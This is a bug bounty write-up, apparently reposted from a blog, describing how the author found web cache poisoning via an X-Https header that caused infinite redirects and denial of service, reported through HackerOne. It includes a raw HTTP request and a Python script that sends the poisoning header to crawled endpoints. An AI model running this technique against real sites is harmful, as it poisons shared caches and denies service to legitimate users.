From Minor Bug to Major DoS: My Journey with Web Cache Poisoning

1 day ago 8
BOOK THIS SPACE FOR AD
ARTICLE AD

Ayushkr

It started with a routine exploration of the samlsso endpoint on a [redacted] platform. At first, it seemed like a typical authentication endpoint, but a small anomaly hinted at something deeper.

Disclaimer: The domain names used in this write-up are anonymized as redacted.com for privacy and security reasons.

While testing, I discovered that the samlsso endpoint accepted an additional parameter called X-Https, which caused the server to issue a 301 redirect. Here’s the request I used to observe this behavior:

POST /samlsso/?cache=foobar HTTP/2
Host: www.redacted.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.redacted.com/account/details.html
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

HTTP/1.1 301 Moved Permanently
Location: https://www.redacted.com/samlsso?cache=foobar
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close

The server’s response was clear — it issued a 301 redirect. While this by itself wasn’t a vulnerability since the request wasn’t cached, it provided a clue: the server might also accept X-Https on cacheable endpoints.

To test my hypothesis, I needed to check cacheable endpoints for similar behavior. Instead of manual testing, I automated the process using a Python script. The list of URLs (crawled.txt) was generated using Burp Suite’s crawler, which mapped out all the accessible endpoints on the domain.

Here’s the the script I used:

import requests
from concurrent.futures import ThreadPoolExecutor, as_completed

# Load crawled endpoints and add cache buster
with open("crawled.txt", "r") as f:
endpoints = [url.strip() + "?cache=foobar" for url in f.readlines()]

vulnerable_endpoints = []
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0",
"Accept": "*/*",
"X-Https": "foobar"
}

def check_endpoint(endpoint):
try:
response = requests.get(endpoint, headers=headers, allow_redirects=True, timeout=10)
if response.history and len(response.history) > 1:
# Check if it keeps redirecting to the same poisoned URL
if response.url == endpoint:
print(f"[VULNERABLE] Infinite redirect detected: {endpoint}")
return endpoint
except requests.exceptions.RequestException as e:
print(f"[ERROR] Failed to check {endpoint}: {e}")
return None

# Use ThreadPoolExecutor to check endpoints concurrently
with ThreadPoolExecutor(max_workers=10) as executor:
future_to_endpoint = {executor.submit(check_endpoint, endpoint): endpoint for endpoint in endpoints}
for future in as_completed(future_to_endpoint):
result = future.result()
if result:
vulnerable_endpoints.append(result)

# Save the results
with open("poisoned_endpoints.txt", "w") as f:
for url in vulnerable_endpoints:
f.write(url + "\n")

Loading and Preparing Endpoints:
The script reads URLs from crawled.txt and appends ?cache=foobar to avoid poisoning live URLs.Sending Concurrent Requests:
Using ThreadPoolExecutor, the script sends requests concurrently with the X-Https header, making the process faster.Checking Redirects:
It checks if the response history indicates multiple redirects and if the final URL matches the original. A match signals a poisoned cache, causing infinite redirects.Saving Results:
Vulnerable URLs are saved in poisoned_endpoints.txt.

Within minutes, the script identified several poisoned endpoints. Opening these URLs in a browser revealed the infinite redirect issue in action. The browser would continuously loop, unable to load the page, effectively causing a Denial of Service (DoS).

After responsibly disclosing the issue, it was quickly triaged and confirmed by the security team on HackerOne. Below is a screenshot of the triaged report for reference:

This experience demonstrated how a minor clue, like a 301 redirect, can lead to discovering a critical vulnerability capable of mass DoS on the root domain. By exploiting web cache poisoning, I was able to identify multiple endpoints that could disrupt service for legitimate users.

Responsible disclosure ensured these vulnerabilities were patched without causing harm. For bug hunters, it’s a reminder that persistence and creative thinking can turn small hints into major finds.

Read Entire Article